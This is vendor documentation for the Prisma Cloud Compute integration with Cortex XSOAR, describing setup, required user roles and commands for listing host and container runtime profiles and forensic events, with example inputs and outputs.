Skip to main content

Palo Alto Networks - Prisma Cloud Compute

This Integration is part of the Prisma Cloud Compute by Palo Alto Networks Pack.#

Prismaâ„¢ Cloud Compute Edition delivers cloud workload protection (CWPP) for modern enterprises, providing holistic protection across hosts, containers, and serverless deployments in any cloud, throughout the application lifecycle. Prisma Cloud Compute Edition is cloud native and API-enabled, protecting all your workloads regardless of their underlying compute technology or the cloud in which they run.

This integration lets you import Palo Alto Networks - Prisma Cloud Compute alerts into Cortex XSOAR.

Configure Prisma Cloud Compute to Send Alerts to Cortex XSOAR#

To send alerts from Prisma Cloud Compute to Cortex XSOAR, you need to create an alert profile.

  1. Log in to your Prisma Cloud Compute console.
  2. Navigate to Manage > Alerts.
  3. Click Add Profile to create a new alert profile.
  4. On the left, select Demisto from the provider list.
  5. On the right, select the alert triggers. Alert triggers specify which alerts are sent to Cortex XSOAR.
  6. Click Save to save the alert profile.
  7. Make sure you configure the user role to be at least auditor, otherwise you will not be able to fetch the alerts.

Configure Prisma Cloud Compute on Cortex XSOAR#

  1. Navigate to Settings > Integrations > Servers & Services.
  2. Search for Prisma Cloud Compute.
  3. Click Add instance to create and configure a new integration.
    ParameterDescriptionExample
    NameA meaningful name for the integration instance.Prisma Cloud Compute_<alertProfileName>
    Fetches incidentsConfigures this integration instance to fetch alerts from Prisma Cloud Compute.N/A
    Prisma Cloud Compute Console URLURL address and port of your Prisma Cloud Compute console. Copy the address from the alert profile created in Prisma Cloud Compute.https://proxyserver.com
    Prisma Cloud Compute Project Name (if applicable)Copy the project name from the alert profile created in Prisma Cloud Compute and paste in this field.N/A
    Trust any certificate (not secure)Skips verification of the CA certificate (not recommended).N/A
    Use system proxy settingsRuns the integration instance using the proxy server (HTTP or HTTPS) that you defined in the server configuration.https://proxyserver.com
    UsernamePrisma Cloud Compute login credentials.N/A
    Prisma Cloud Compute CA CertificateCA Certificate used by Prisma Cloud Compute. Copy the certificate from the alert profile created in Prisma Cloud Compute.N/A
    Source ReliabilityReliability of the source providing the intelligence data.False
  4. Click Test to validate the integration.
  5. Click Done to save the integration.

Configure Prisma Cloud Compute User Roles#

  • In order to access Prisma Cloud Compute resources, a user must be assigned with a role.
  • Without sufficient user roles, commands/fetching incidents might not work.
  • See below the user roles and their descriptions.
  • See 'Requires Role' section (each command requires a different type of role).

1) Go to Manage -> Authentication.

2) Choose the user that you want to edit roles -> Actions -> Press ....

3) Press on Edit -> Choose a Role in the Role section.

User Roles Configuration

Required User Roles#

In order to use the entire integration commands a user must have the permissions of the following user roles:

  • devSecOps
  • ci
  • auditor
  • operator
  • devOps
  • vulnerabilityManager

The administrator user role can use the entire integration commands.

See user roles descriptions in Prisma Cloud Compute: Available User Roles

Commands#

You can execute these commands from the Cortex XSOAR CLI, as part of an automation, or in a playbook. After you successfully execute a command, a DBot message appears in the War Room with the command details.

prisma-cloud-compute-profile-host-list#


Get information about the hosts and their profile events. This command supports asterisks which allows you to get host profiles by filtering its fields according to a specific substring.

Base Command#

prisma-cloud-compute-profile-host-list

Requires Role#

devSecOps

Input#

Argument NameDescriptionRequired
hostnameA comma-separated list of profile (hostname) IDs. For example, !prisma-cloud-compute-profile-host-list hostname="149,257".Optional
limitThe maximum number of hosts and their profile events to return. Must be between 1-50. Default is 15.Optional
offsetThe offset by which to begin listing hosts and their profile events. Default is 0.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.ProfileHost._idStringThe profile ID (hostname).
PrismaCloudCompute.ProfileHost.accountIDStringThe cloud account ID associated with the profile.
PrismaCloudCompute.ProfileHost.apps.listeningPorts.commandStringThe command that triggered the connection.
PrismaCloudCompute.ProfileHost.apps.listeningPorts.modifiedDateThe timestamp of when the event occurred.
PrismaCloudCompute.ProfileHost.apps.listeningPorts.portNumberThe listening port number.
PrismaCloudCompute.ProfileHost.apps.listeningPorts.processPathStringThe path to the process that uses the port.
PrismaCloudCompute.ProfileHost.apps.nameStringThe app name.
PrismaCloudCompute.ProfileHost.apps.outgoingPorts.commandStringThe command that triggered the connection.
PrismaCloudCompute.ProfileHost.apps.outgoingPorts.countryStringThe country ISO code for the given IP address.
PrismaCloudCompute.ProfileHost.apps.outgoingPorts.ipStringThe IP address captured over this port.
PrismaCloudCompute.ProfileHost.apps.outgoingPorts.modifiedDateThe timestamp of when the event occurred.
PrismaCloudCompute.ProfileHost.apps.outgoingPorts.portNumberThe outgoing port number.
PrismaCloudCompute.ProfileHost.apps.outgoingPorts.processPathStringThe path to the process that uses the port.
PrismaCloudCompute.ProfileHost.apps.processes.commandStringThe executed command.
PrismaCloudCompute.ProfileHost.apps.processes.md5StringThe process binary MD5 sum.
PrismaCloudCompute.ProfileHost.apps.processes.modifiedBooleanWhether the process binary was modified after the container started.
PrismaCloudCompute.ProfileHost.apps.processes.pathStringThe process binary path.
PrismaCloudCompute.ProfileHost.apps.processes.ppathStringThe parent process path.
PrismaCloudCompute.ProfileHost.apps.processes.timeDateThe time in which the process was added. If the process was modified, time is the modification time.
PrismaCloudCompute.ProfileHost.apps.processes.userStringThe username of the user who started the process.
PrismaCloudCompute.ProfileHost.apps.startupProcess.commandStringThe executed command.
PrismaCloudCompute.ProfileHost.apps.startupProcess.md5StringThe process binary MD5 sum.
PrismaCloudCompute.ProfileHost.apps.startupProcess.modifiedBooleanWhether the process binary was modified after the container started.
PrismaCloudCompute.ProfileHost.apps.startupProcess.pathStringThe process binary path.
PrismaCloudCompute.ProfileHost.apps.startupProcess.ppathStringThe parent process path.
PrismaCloudCompute.ProfileHost.apps.startupProcess.timeDateThe time in which the process was added. If the process was modified, time is the modification time.
PrismaCloudCompute.ProfileHost.apps.startupProcess.userStringThe username of the user who started the process.
PrismaCloudCompute.ProfileHost.collectionsStringA list of collections to which this profile applies.
PrismaCloudCompute.ProfileHost.createdDateThe profile creation time.
PrismaCloudCompute.ProfileHost.hashNumberThe uint32 hash associated with the profile.
PrismaCloudCompute.ProfileHost.labelsStringThe labels associated with the profile.
PrismaCloudCompute.ProfileHost.sshEvents.commandStringThe executed command.
PrismaCloudCompute.ProfileHost.sshEvents.countryStringThe SSH client's country of origin.
PrismaCloudCompute.ProfileHost.sshEvents.ipStringThe connection client IP address.
PrismaCloudCompute.ProfileHost.sshEvents.loginTimeDateThe SSH login time.
PrismaCloudCompute.ProfileHost.sshEvents.md5StringThe process binary MD5 sum.
PrismaCloudCompute.ProfileHost.sshEvents.modifiedBooleanWhether the process binary was modified after the container started.
PrismaCloudCompute.ProfileHost.sshEvents.pathStringThe process binary path.
PrismaCloudCompute.ProfileHost.sshEvents.ppathStringThe parent process path.
PrismaCloudCompute.ProfileHost.sshEvents.timeDateThe time in which the process was added. If the process was modified, time is the modification time.
PrismaCloudCompute.ProfileHost.sshEvents.userStringThe username of the user who started the process.
PrismaCloudCompute.ProfileHost.timeDateThe last time this profile was modified.
PrismaCloudCompute.ProfileHost.geoip.countries.codeStringThe country code of the computer that accessed the host.
PrismaCloudCompute.ProfileHost.geoip.countries.ipStringThe IP address of the computer that accessed the host.
PrismaCloudCompute.ProfileHost.geoip.countries.modifiedDateThe last time the IP address associated with this country accessed the host console.
PrismaCloudCompute.ProfileHost.geoip.modifiedDateThe last time any of the country IP addresses accessed the host console.

Command Example#

!prisma-cloud-compute-profile-host-list hostname=*163*

Context Example#

{
"PrismaCloudCompute": {
"ProfileHost": {
"hash": 1,
"created": "2020-11-10T09:37:30.314Z",
"geoip": {
"modified": "2021-12-10T11:06:03.206Z",
"countries": [
{
"ip": "1.1.1.1",
"code": "US",
"modified": "2021-12-10T11:06:03.206Z"
},
{
"ip": "2.2.2.2",
"code": "IE",
"modified": "2021-12-10T05:22:01.858Z"
}
]
},
"labels": [
"osDistro:amzn",
"osVersion:2"
],
"apps": [
{
"processes": [
{
"ppath": "/usr/lib/systemd/systemd",
"command": "/usr/sbin/auditd",
"user": "root",
"time": "2020-11-10T09:37:30.415Z",
"path": "/usr/sbin/auditd",
"md5": ""
}
],
"startupProcess": {
"ppath": "/usr/lib/systemd/systemd",
"command": "/usr/sbin/auditd",
"user": "root",
"time": "2020-11-10T09:37:30.415Z",
"path": "/usr/sbin/auditd",
"md5": ""
},
"name": "auditd"
},
{
"processes": [
{
"ppath": "/usr/lib/systemd/systemd",
"command": "/usr/sbin/atd -f",
"user": "root",
"time": "2020-11-10T09:37:30.415Z",
"path": "/usr/sbin/atd",
"md5": ""
}
],
"startupProcess": {
"ppath": "/usr/lib/systemd/systemd",
"command": "/usr/sbin/atd -f",
"user": "root",
"time": "2020-11-10T09:37:30.415Z",
"path": "/usr/sbin/atd",
"md5": ""
},
"name": "atd"
}
],
"collections": [
"All",
"123"
],
"time": "2021-12-10T11:06:03.206Z",
"sshEvents": [
{
"ppath": "/usr/bin/bash",
"country": "IL",
"time": "December 10, 2021 11:06:03 AM",
"command": "grep twistlock_data - High rate of events, throttling started",
"user": "user123",
"ip": "1.2.3.4",
"path": "/usr/bin/grep",
"loginTime": "September 02, 2021 09:27:41 AM",
"md5": ""
},
{
"ppath": "/usr/bin/bash",
"country": "IL",
"time": "December 10, 2021 11:06:03 AM",
"command": "docker -H unix:///var/run/docker.sock ps -a --format {{ .Names }}",
"user": "user123",
"ip": "1.1.1.1",
"path": "/usr/bin/docker",
"loginTime": "September 02, 2021 09:27:41 AM",
"md5": ""
}
],
"_id": "host163",
"accountID": "1234"
}
}
}

Human Readable Output - One Host#

Host Description#

HostnameDistributionCollections
host163amzn 2All,
123

Apps#

AppNameStartupProcessUserLaunchTime
auditd/usr/sbin/auditdrootNovember 10, 2020 09:37:30 AM
atd/usr/sbin/atdrootNovember 10, 2020 09:37:30 AM

SSH Events#

UserIpProcessPathCommandTime
user1231.2.3.4/usr/bin/grepgrep twistlock_data - High rate of events, throttling startedDecember 10, 2021 11:06:03 AM
user1231.1.1.1/usr/bin/dockerdocker -H unix:///var/run/docker.sock ps -a --format {{ .Names }}December 10, 2021 11:06:03 AM

Human Readable Output - Multiple Hosts#

Host Description#

HostnameDistributionCollections
host163amzn 2All,
123
host249Ubuntu 16.04All,
123

prisma-cloud-compute-profile-container-list#


Get information about the containers and their profile events. This command supports asterisks which allows you to get container profiles by filtering its fields according to a specific substring.

Base Command#

prisma-cloud-compute-profile-container-list

Requires Role#

devSecOps

Input#

Argument NameDescriptionRequired
clusterA comma-separated list of runtime profile Kubernetes clusters.Optional
idA comma-separated list of runtime profile (hostname) IDs. For example, !prisma-cloud-compute-profile-container-list id="256,148".Optional
imageA comma-separated list of runtime profile images. For example, !prisma-cloud-compute-profile-container-list image="console,defender".Optional
image_idA comma-separated list of runtime profile image IDs. For example, !prisma-cloud-compute-profile-container-list image_id="123,456".Optional
namespaceA comma-separated list of runtime profile Kubernetes namespaces. For example, !prisma-cloud-compute-profile-container-list namespace="namespace1,namespace2".Optional
osA comma-separated list of service runtime profile operating systems. For example, !prisma-cloud-compute-profile-container-list os="Red Hat,Windows".Optional
stateA comma-separated list of runtime profile states. For example, !prisma-cloud-compute-profile-container-list state=active.Optional
limitThe maximum number of containers and their profile events. Must be between 1-50. Default is 15.Optional
offsetThe offset by which to begin listing containers and their profile events. Default is 0.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.ProfileContainer._idStringThe profile ID.
PrismaCloudCompute.ProfileContainer.accountsIDsStringThe cloud account IDs associated with the container runtime profile.
PrismaCloudCompute.ProfileContainer.archivedBooleanWhether this profile is archived.
PrismaCloudCompute.ProfileContainer.capabilities.ciBooleanWhether the container is allowed to write binaries to disk and run them based on static analysis.
PrismaCloudCompute.ProfileContainer.capabilities.cloudMetadataBooleanWhether the given container can query cloud metadata API based on static analysis.
PrismaCloudCompute.ProfileContainer.capabilities.dnsCacheBooleanWhether the DNS services used by all the pods in the cluster were added to the profile based on static analysis.
PrismaCloudCompute.ProfileContainer.capabilities.dynamicDNSQueryBooleanWhether capped behavioral DNS queries were added to the profile based on static analysis.
PrismaCloudCompute.ProfileContainer.capabilities.dynamicFileCreationBooleanWhether capped behavioral file system paths were added to the profile based on static analysis.
PrismaCloudCompute.ProfileContainer.capabilities.dynamicProcessCreationBooleanWhether capped behavioral processes were added to the profile based on static analysis.
PrismaCloudCompute.ProfileContainer.capabilities.k8sBooleanWhether the given container can perform Kubernetes networking tasks (e.g., contact to API server).
PrismaCloudCompute.ProfileContainer.capabilities.proxyBooleanWhether the container can listen on any port and perform multiple outbound connections.
PrismaCloudCompute.ProfileContainer.capabilities.sshdBooleanWhether the container can run sshd processes.
PrismaCloudCompute.ProfileContainer.capabilities.unpackerBooleanWhether the container is allowed to write shared libraries to disk.
PrismaCloudCompute.ProfileContainer.clusterStringThe provided cluster name.
PrismaCloudCompute.ProfileContainer.collectionsStringCollections to which this profile applies.
PrismaCloudCompute.ProfileContainer.createdDateThe profile creation time.
PrismaCloudCompute.ProfileContainer.entrypointStringThe image entrypoint.
PrismaCloudCompute.ProfileContainer.events._idStringThe history event entity.
PrismaCloudCompute.ProfileContainer.events.commandStringThe process that was executed.
PrismaCloudCompute.ProfileContainer.events.hostnameStringThe hostname on which the command was invoked.
PrismaCloudCompute.ProfileContainer.events.timeDateThe time of the event.
PrismaCloudCompute.ProfileContainer.filesystem.behavioral.mountBooleanWhether the given folder is mounted.
PrismaCloudCompute.ProfileContainer.filesystem.behavioral.pathStringThe file path.
PrismaCloudCompute.ProfileContainer.filesystem.behavioral.processStringThe process that accessed the file.
PrismaCloudCompute.ProfileContainer.filesystem.behavioral.timeDateThe time in which the file was added.
PrismaCloudCompute.ProfileContainer.filesystem.static.mountBooleanWhether the given folder is a mounted.
PrismaCloudCompute.ProfileContainer.filesystem.static.pathStringThe file path.
PrismaCloudCompute.ProfileContainer.filesystem.static.processStringThe process that accessed the file.
PrismaCloudCompute.ProfileContainer.filesystem.static.timeDateThe time in which the file was added.
PrismaCloudCompute.ProfileContainer.hashNumberThe uint32 hash associated with the profile.
PrismaCloudCompute.ProfileContainer.hostNetworkBooleanWhether the instance shares the network namespace with the host.
PrismaCloudCompute.ProfileContainer.hostPidBooleanWhether the instance shares the PID namespace with the host.
PrismaCloudCompute.ProfileContainer.imageStringThe image the container runs with.
PrismaCloudCompute.ProfileContainer.imageIDStringThe profile's image ID.
PrismaCloudCompute.ProfileContainer.infraBooleanWhether this is an infrastructure container.
PrismaCloudCompute.ProfileContainer.istioBooleanWhether it is an Istio-monitored profile.
PrismaCloudCompute.ProfileContainer.k8s.clusterRoles.labels.keyStringThe key of the label.
PrismaCloudCompute.ProfileContainer.k8s.clusterRoles.labels.valueStringThe value of the label.
PrismaCloudCompute.ProfileContainer.k8s.clusterRoles.nameStringThe role name.
PrismaCloudCompute.ProfileContainer.k8s.clusterRoles.roleBindingStringThe name of the role binding used for display.
PrismaCloudCompute.ProfileContainer.k8s.clusterRoles.rulesStringThe list of rules associated with the cluster role.
PrismaCloudCompute.ProfileContainer.k8s.roles.labels.keyStringThe key of the label.
PrismaCloudCompute.ProfileContainer.k8s.roles.labels.valueStringThe value of the label.
PrismaCloudCompute.ProfileContainer.k8s.roles.nameStringThe Kubernetes role name.
PrismaCloudCompute.ProfileContainer.k8s.roles.namespaceStringThe namespace associated with the role.
PrismaCloudCompute.ProfileContainer.k8s.roles.roleBindingStringThe name of the role binding used for display.
PrismaCloudCompute.ProfileContainer.k8s.roles.rulesStringThe policy rules associated with the role.
PrismaCloudCompute.ProfileContainer.k8s.serviceAccountStringThe service account used to access the Kubernetes API server. This field will be empty if the container is not running inside of a pod.
PrismaCloudCompute.ProfileContainer.labelStringThe profile's label.
PrismaCloudCompute.ProfileContainer.lastUpdateDateThe last time this profile was modified.
PrismaCloudCompute.ProfileContainer.learnedStartupBooleanWhether the startup events were learned.
PrismaCloudCompute.ProfileContainer.namespaceStringThe Kubernetes deployment namespace.
PrismaCloudCompute.ProfileContainer.network.behavioral.dnsQueries.domainNameStringThe queried domain name.
PrismaCloudCompute.ProfileContainer.network.behavioral.dnsQueries.domainTypeStringThe queried domain type.
PrismaCloudCompute.ProfileContainer.network.listeningPorts.appStringThe name of the app.
PrismaCloudCompute.ProfileContainer.network.listeningPorts.portsData.allBooleanWhether this port data represents any arbitrary ports.
PrismaCloudCompute.ProfileContainer.network.listeningPorts.portsData.ports.portNumberThe port number.
PrismaCloudCompute.ProfileContainer.network.listeningPorts.portsData.ports.timeDateThe learning timestamp of this port.
PrismaCloudCompute.ProfileContainer.network.outboundPorts.portsData.allBooleanWhether this port data represents any arbitrary ports.
PrismaCloudCompute.ProfileContainer.network.outboundPorts.portsData.ports.portNumberThe port number.
PrismaCloudCompute.ProfileContainer.network.static.listeningPorts.ports.timeDateThe learning timestamp of this port.
PrismaCloudCompute.ProfileContainer.network.static.listeningPorts.appStringThe name of the app.
PrismaCloudCompute.ProfileContainer.network.static.listeningPorts.portsData.allBooleanWhether this port data represents any arbitrary ports.
PrismaCloudCompute.ProfileContainer.network.static.listeningPorts.portsData.ports.portNumberThe port number.
PrismaCloudCompute.ProfileContainer.network.static.listeningPorts.portsData.ports.timeDateThe learning timestamp of this port.
PrismaCloudCompute.ProfileContainer.osStringThe profile image operating system.
PrismaCloudCompute.ProfileContainer.processes.behavioral.commandStringThe executed command.
PrismaCloudCompute.ProfileContainer.processes.behavioral.md5StringThe process binary MD5 sum.
PrismaCloudCompute.ProfileContainer.processes.behavioral.modifiedBooleanWhether the process binary was modified after the container started.
PrismaCloudCompute.ProfileContainer.processes.behavioral.pathStringThe process binary path.
PrismaCloudCompute.ProfileContainer.processes.behavioral.ppathStringThe parent process path.
PrismaCloudCompute.ProfileContainer.processes.behavioral.timeDateThe time in which the process was added. If the process was modified, time is the modification time.
PrismaCloudCompute.ProfileContainer.processes.behavioral.userStringThe username of the user who started the process.
PrismaCloudCompute.ProfileContainer.processes.static.commandStringThe executed command.
PrismaCloudCompute.ProfileContainer.processes.static.md5StringThe process binary MD5 sum.
PrismaCloudCompute.ProfileContainer.processes.static.modifiedBooleanWhether the process binary was modified after the container started.
PrismaCloudCompute.ProfileContainer.processes.static.pathStringThe process binary path.
PrismaCloudCompute.ProfileContainer.processes.static.ppathStringThe parent process path.
PrismaCloudCompute.ProfileContainer.processes.static.timeDateThe time in which the process was added. If the process was modified, time is the modification time.
PrismaCloudCompute.ProfileContainer.processes.static.userStringThe username of the user who started the process.
PrismaCloudCompute.ProfileContainer.relearningCauseStringThe reason a profile entered the learning mode after being activated.
PrismaCloudCompute.ProfileContainer.remainingLearningDurationSecNumberThe total time left that the system needs to finish learning this image.
PrismaCloudCompute.ProfileContainer.stateStringThe current state of the profile.

Command Example#

!prisma-cloud-compute-profile-container-list image=*defender* limit=1

Context Example#

{
"PrismaCloudCompute": {
"ProfileContainer": {
"image": "twistlock/private:defender_21_04_439",
"hostNetwork": true,
"learnedStartup": true,
"k8s": {},
"archived": false,
"network": {
"geoip": {
"modified": "2021-12-10T13:31:42.924Z",
"countries": [
{
"ip": "1.1.1.1",
"code": "IE",
"modified": "2021-12-10T13:31:42.922Z"
},
{
"ip": "2.2.2.2",
"code": "US",
"modified": "2021-12-09T13:30:42.148Z"
}
]
},
"static": {
"listeningPorts": []
},
"behavioral": {
"outboundPorts": {
"ports": [
{
"port": 80,
"time": "2021-09-02T11:05:16.836Z"
}
]
}
}
},
"capabilities": {
"ci": true
},
"label": "twistlock",
"state": "active",
"collections": [
"All",
"123",
"Prisma Cloud resources"
],
"entrypoint": "/usr/local/bin/defender",
"events": null,
"lastUpdate": "2021-09-02T11:05:10.935Z",
"hash": 3,
"infra": false,
"accountIDs": [
"123"
],
"processes": {
"static": [
{
"ppath": "",
"path": "/usr/bin/mongodump",
"time": "0001-01-01T00:00:00Z",
"md5": ""
},
{
"ppath": "",
"path": "/usr/bin/mongorestore",
"time": "0001-01-01T00:00:00Z",
"md5": ""
}
],
"behavioral": [
{
"ppath": "/usr/local/bin/defender",
"path": "/usr/local/bin/fsmon",
"time": "2021-09-02T11:05:08.931Z",
"md5": ""
},
{
"ppath": "/usr/bin/apt-get",
"path": "/usr/lib/apt/methods/gpgv",
"time": "2021-11-24T15:12:28.502Z",
"command": "gpgv",
"md5": ""
}
]
},
"created": "2020-09-02T11:05:08.931Z",
"imageID": "sha256:8d82e2c21c33e1ffb37ea901d18df15c08123258609e6d7c4aecc7fb4a5a8738",
"filesystem": {
"static": [
{
"process": "*",
"path": "/var/log/audit",
"mount": true,
"time": "2021-09-02T11:05:08.931Z"
},
{
"process": "*",
"path": "/var/lib/twistlock",
"mount": true,
"time": "2021-09-02T11:05:08.931Z"
}
],
"behavioral": [
{
"process": "/usr/local/bin/defender",
"path": "/prisma-static-data",
"mount": true,
"time": "2021-09-02T11:05:10.935Z"
},
{
"process": "/usr/local/bin/defender",
"path": "/tmp",
"mount": false,
"time": "2021-09-02T11:05:16.784Z"
}
]
},
"_id": "container123",
"os": "Red Hat Enterprise Linux 8.4 (Ootpa)",
"remainingLearningDurationSec": -1,
"hostPid": true
}
}
}

Human Readable Output - One Container#

Container Description#

ContainerIDImageOsStateCreatedEntryPoint
container123twistlock/private:defender_21_04_439Red Hat Enterprise Linux 8.4 (Ootpa)activeSeptember 02, 2020 11:05:08 AM/usr/local/bin/defender

Processes#

TypePathDetectionTime
static/usr/bin/mongodumpJanuary 01, 2021 00:00:00 AM
static/usr/bin/mongorestoreJanuary 01, 2021 00:00:00 AM
behavioral/usr/local/bin/fsmonSeptember 02, 2021 11:05:08 AM
behavioral/usr/lib/apt/methods/gpgvNovember 24, 2021 15:12:28 PM

Human Readable Output - Multiple Containers#

Container Description#

ContainerIDImageOsStateCreatedEntryPoint
container123twistlock/private:defender_21_04_439Red Hat Enterprise Linux 8.4 (Ootpa)activeSeptember 02, 2021 11:05:08 AM/usr/local/bin/defender
container1234twistlock/private:console_21_04_439Red Hat Enterprise Linux 8.4 (Ootpa)activeSeptember 02, 2021 11:05:08 AM/app/server

prisma-cloud-compute-profile-container-hosts-list#


Get the hosts where a specific container is running.

Base Command#

prisma-cloud-compute-profile-container-hosts-list

Requires Role#

devSecOps

Input#

Argument NameDescriptionRequired
idContainer profile ID. Can be retrieved from the prisma-cloud-compute-profile-container-list command.Required
limitThe maximum number of hosts to return. Must be between 1-50. Default is 50.Optional
offsetThe offset by which to begin listing hosts of the container. Default is 0.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.ProfileContainerHost.containerIDStringThe container ID.
PrismaCloudCompute.ProfileContainerHost.hostsIDsStringThe list of hosts where this container is running.

Command Example#

!prisma-cloud-compute-profile-container-hosts-list id=container123

Context Example#

{
"PrismaCloudCompute": {
"ProfileContainerHost": {
"containerID": "container123",
"hostsIDs": [
"host1",
"host2"
]
}
}
}

Human Readable Output#

Hosts#

HostsIDs
host1,
host2

prisma-cloud-compute-profile-container-forensic-list#


Get runtime forensics data for a specific container on a specific host.

Base Command#

prisma-cloud-compute-profile-container-forensic-list

Input#

Argument NameDescriptionRequired
idThe container ID. Can be retrieved from the prisma-cloud-compute-profile-container-list command.Required
collectionsThe collections scoping the query.Optional
hostnameThe hostname for which data should be fetched.Required
incident_idThe incident ID in case the request type is an incident.Optional
limitThe maximum number of forensics data records to return. Must be between 1-50. Default is 20.Optional
offsetThe offset by which to begin listing records from. Default is 0.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.ContainerForensic.containerIDStringThe container ID.
PrismaCloudCompute.ContainerForensic.hostnameStringThe hostname.
PrismaCloudCompute.ContainerForensic.Forensics.allPortsBooleanWhether all listening ports are allowed.
PrismaCloudCompute.ContainerForensic.Forensics.attackStringThe event attack type.
PrismaCloudCompute.ContainerForensic.Forensics.categoryStringThe incident category.
PrismaCloudCompute.ContainerForensic.Forensics.commandStringThe event command.
PrismaCloudCompute.ContainerForensic.Forensics.containerIdStringThe event container ID.
PrismaCloudCompute.ContainerForensic.Forensics.dstIPStringThe destination IP address of the connection.
PrismaCloudCompute.ContainerForensic.Forensics.dstPortStringThe destination port.
PrismaCloudCompute.ContainerForensic.Forensics.dstProfileIDStringThe profile ID of the connection destination.
PrismaCloudCompute.ContainerForensic.Forensics.effectStringThe runtime audit effect.
PrismaCloudCompute.ContainerForensic.Forensics.listeningStartTimeDateThe port listening start time.
PrismaCloudCompute.ContainerForensic.Forensics.messageStringThe runtime audit message.
PrismaCloudCompute.ContainerForensic.Forensics.networkCollectionTypeStringThe type of the network collection method.
PrismaCloudCompute.ContainerForensic.Forensics.outboundBooleanWhether the port is outbound.
PrismaCloudCompute.ContainerForensic.Forensics.pathStringThe event path.
PrismaCloudCompute.ContainerForensic.Forensics.pidNumberThe event process ID.
PrismaCloudCompute.ContainerForensic.Forensics.portNumberThe listening port.
PrismaCloudCompute.ContainerForensic.Forensics.ppidNumberThe event parent process ID.
PrismaCloudCompute.ContainerForensic.Forensics.processStringThe event process description.
PrismaCloudCompute.ContainerForensic.Forensics.srcIPStringThe source IP of the connection
PrismaCloudCompute.ContainerForensic.Forensics.srcProfileIDStringThe profile ID of the connection source.
PrismaCloudCompute.ContainerForensic.Forensics.staticBooleanWhether the event was added to the profile without behavioral indications.
PrismaCloudCompute.ContainerForensic.Forensics.typeStringThe event type.
PrismaCloudCompute.ContainerForensic.Forensics.timestampDateThe event timestamp.
PrismaCloudCompute.ContainerForensic.Forensics.userStringThe event user.

Command Example#

!prisma-cloud-compute-profile-container-forensic-list id=container123 hostname=host123 limit=2

Context Example#

{
"PrismaCloudCompute": {
"ContainerForensic": {
"Forensics": [
{
"containerId": "a6f769dd",
"timestamp": "December 10, 2021 11:49:50 AM",
"pid": 1341,
"listeningStartTime": "January 01, 0001 00:00:00 AM",
"command": "mongodump --out=/var/lib/twistlock-backup/dump",
"user": "twistlock",
"path": "/usr/bin/mongodump",
"ppid": 15816,
"type": "Process spawned"
},
{
"containerId": "a6f769dd",
"timestamp": "December 09, 2021 11:49:22 AM",
"pid": 20891,
"listeningStartTime": "January 01, 0001 00:00:00 AM",
"command": "mongodump --out=/var/lib/twistlock-backup/dump",
"user": "twistlock",
"path": "/usr/bin/mongodump",
"ppid": 15816,
"type": "Process spawned"
}
],
"containerID": "container123",
"hostname": "host123"
}
}
}

Human Readable Output#

Containers forensic report#

TypePathUserPidContainerIdTimestampCommand
Process spawned/usr/bin/mongodumptwistlock1341a6f769ddDecember 10, 2021 11:49:50 AMmongodump --out=/var/lib/twistlock-backup/dump
Process spawned/usr/bin/mongodumptwistlock20891a6f769ddDecember 09, 2021 11:49:22 AMmongodump --out=/var/lib/twistlock-backup/dump

prisma-cloud-compute-host-forensic-list#


Get forensics on a specific host.

Base Command#

prisma-cloud-compute-host-forensic-list

Requires Role#

devSecOps

Input#

Argument NameDescriptionRequired
idThe host ID. Can be retrieved from the prisma-cloud-compute-profile-host-list command.Required
collectionsThe collections scoping the query.Optional
incident_idThe incident ID in case the request type is an incident.Optional
limitThe maximum number of forensics data records to return. Must be between 1-50. Default is 20.Optional
offsetThe offset by which to begin listing host forensics from. Default is 0.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.HostForensic.Forensics.appStringThe application associated with the event.
PrismaCloudCompute.HostForensic.Forensics.attackStringThe event attack type.
PrismaCloudCompute.HostForensic.Forensics.categoryStringThe incident category.
PrismaCloudCompute.HostForensic.Forensics.commandStringThe event command.
PrismaCloudCompute.HostForensic.Forensics.countryStringThe country associated with the event.
PrismaCloudCompute.HostForensic.Forensics.effectStringThe runtime audit effect.
PrismaCloudCompute.HostForensic.Forensics.interactiveBooleanWhether the event is interactive.
PrismaCloudCompute.HostForensic.Forensics.ipStringThe IP address associated with the event.
PrismaCloudCompute.HostForensic.Forensics.listeningStartTimeDateThe listening port start time.
PrismaCloudCompute.HostForensic.Forensics.messageStringThe runtime audit message.
PrismaCloudCompute.HostForensic.Forensics.pathStringThe event path.
PrismaCloudCompute.HostForensic.Forensics.pidNumberThe event process ID.
PrismaCloudCompute.HostForensic.Forensics.portNumberThe listening port.
PrismaCloudCompute.HostForensic.Forensics.ppathStringThe event parent path.
PrismaCloudCompute.HostForensic.Forensics.ppidNumberThe event parent process ID.
PrismaCloudCompute.HostForensic.Forensics.processStringThe event process.
PrismaCloudCompute.HostForensic.Forensics.timestampDateThe event timestamp.
PrismaCloudCompute.HostForensic.Forensics.typeStringThe event type.
PrismaCloudCompute.HostForensic.Forensics.userStringThe event user.
PrismaCloudCompute.HostForensic.hostIDStringThe host ID that was analyzed.

Command Example#

!prisma-cloud-compute-host-forensic-list id=hostname123 limit=3 offset=5

Context Example#

{
"PrismaCloudCompute": {
"HostForensic": {
"Forensics": [
{
"ppath": "/bin/bash",
"timestamp": "December 10, 2021 21:36:03 PM",
"app": "cron",
"pid": 17478,
"listeningStartTime": "January 01, 0001 00:00:00 AM",
"command": "awk { printf $3 \"|\" $2 \"|\" $1 \":\"}",
"user": "cakeagent",
"path": "/usr/bin/gawk",
"ppid": 17475,
"type": "Process spawned",
"interactive": true
},
{
"ppath": "/bin/bash",
"timestamp": "December 10, 2021 21:36:03 PM",
"app": "cron",
"pid": 17477,
"listeningStartTime": "January 01, 0001 00:00:00 AM",
"command": "grep -vE ^Filesystem|tmpfs|cdrom",
"user": "cakeagent",
"path": "/bin/grep",
"ppid": 17475,
"type": "Process spawned",
"interactive": true
},
{
"ppath": "/bin/bash",
"timestamp": "December 10, 2021 21:36:03 PM",
"app": "cron",
"pid": 17476,
"listeningStartTime": "January 01, 0001 00:00:00 AM",
"command": "df -H -P -B G",
"user": "cakeagent",
"path": "/bin/df",
"ppid": 17475,
"type": "Process spawned",
"interactive": true
}
],
"hostID": "hostname123"
}
}
}

Human Readable Output#

Host forensics report#

TypePathUserPidTimestampCommandApp
